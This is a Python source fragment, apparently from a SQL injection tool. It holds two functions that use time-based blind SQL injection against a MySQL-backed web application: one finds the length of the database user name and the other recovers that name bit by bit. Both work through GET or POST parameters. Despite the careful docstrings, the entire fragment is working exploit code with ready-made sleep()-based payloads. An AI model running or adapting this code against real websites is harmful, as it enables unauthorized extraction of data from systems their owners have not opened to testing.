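def getlen(url, data=None, para=None, max_len=None):
    """Find the length of ``(select user())`` with a time-based blind SQLi oracle.

    For i = 0, 1, 2, ... a ``sleep(if(length((select user()))=i,1,0))``
    payload is sent; the first ``i`` whose response ``httpres`` marks with the
    word ``"timeout"`` is taken to be the length and returned.

    Args:
        url: Target URL. With ``data`` None the (pre-encoded) payload is
            appended straight to the URL (GET injection).
        data: Raw POST body; when given, the payload is appended to the
            ``para`` field of the parsed body instead (POST injection).
        para: Name of the POST parameter to inject into (only with ``data``).
        max_len: Optional upper bound on ``i``. ``None`` (default) keeps the
            original unbounded loop. Pass a bound so a target that never
            produces a timeout (WAF, non-MySQL backend, wrong injection point,
            detection string changed) cannot hang the caller forever.

    Returns:
        The detected length as an int, or ``None`` when ``max_len`` is set
        and no value up to that bound produced a timeout.
    """
    # The oracle is purely a substring match on the response text, so a slow or
    # rate-limited target yields false positives; a 1 s sleep leaves little margin.
    flag = "timeout"
    i = 0
    while max_len is None or i <= max_len:
        print("[+] Checking: %s " % i)
        if data is None:
            # GET: payload is URL-encoded by hand and appended to the query.
            payload = url + "'+or+sleep(if(length((select%20user()))=" + str(i) + ",1,0))%23"
            html = httpres(payload)
        else:
            # POST. NOTE(review): format() here is presumably a project helper that
            # parses ``data`` into a mutable dict (the builtin would return a str) —
            # confirm. It is re-parsed every iteration so payloads do not accumulate.
            fields = format(data)
            fields[para] = fields[para] + "'or sleep(if(length((select user()))=" + str(i) + ",1,0))#"
            post_data = urllib.urlencode(fields)
            html = httpres(url, post_data)
        if flag in html:
            print(u"长度为:%s" % i)
            return i
        i += 1
    return None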
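 def run(self):
     """Recover one bit of ``(select user())`` through a time-based blind SQLi oracle.

     The payload takes character ``self.x`` of the user name, zero-pads its
     binary form to 8 digits and tests digit ``self.str`` of that string
     (``mid()`` positions are 1-based in MySQL); when the digit is 1 the query
     sleeps for 2 s. The result is stored in the module-level ``res`` dict
     under key ``str(self.str)``: ``1`` if ``httpres`` marked the response
     with ``"timeout"``, else ``0``.

     Reads ``self.url``, ``self.str``, ``self.x``, ``self.para`` and
     ``self.data``. GET injection when ``self.data`` is None, otherwise POST
     injection into parameter ``self.para``.
     """
     global res  # shared store for the recovered bits; presumably one instance per bit — confirm keys cannot collide
     url = self.url
     bit = self.str
     pos = self.x
     para = self.para
     data = self.data
     # The oracle is a substring match on the response text, so a slow or
     # rate-limited target produces false 1s; a 2 s sleep leaves little margin.
     flag = "timeout"
     if data is None:
         # GET: pre-encoded payload appended straight to the URL.
         payload = url + "'or+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(pos) + ",1%29%29%29,8,0%29," + str(bit) + ",1%29%29,sleep%282%29,0%29%23"
         html = httpres(payload)
     else:
         # POST. NOTE(review): format() is presumably a project helper that parses
         # ``data`` into a mutable dict (the builtin would return a str) — confirm.
         fields = format(data)
         fields[para] = fields[para] + "'or if(1=(mid(lpad(bin(ord(mid((select user())," + str(pos) + ",1))),8,0)," + str(bit) + ",1)),sleep(2),0)#"
         post_data = urllib.urlencode(fields)
         html = httpres(url, post_data)
     res[str(bit)] = 1 if flag in html else 0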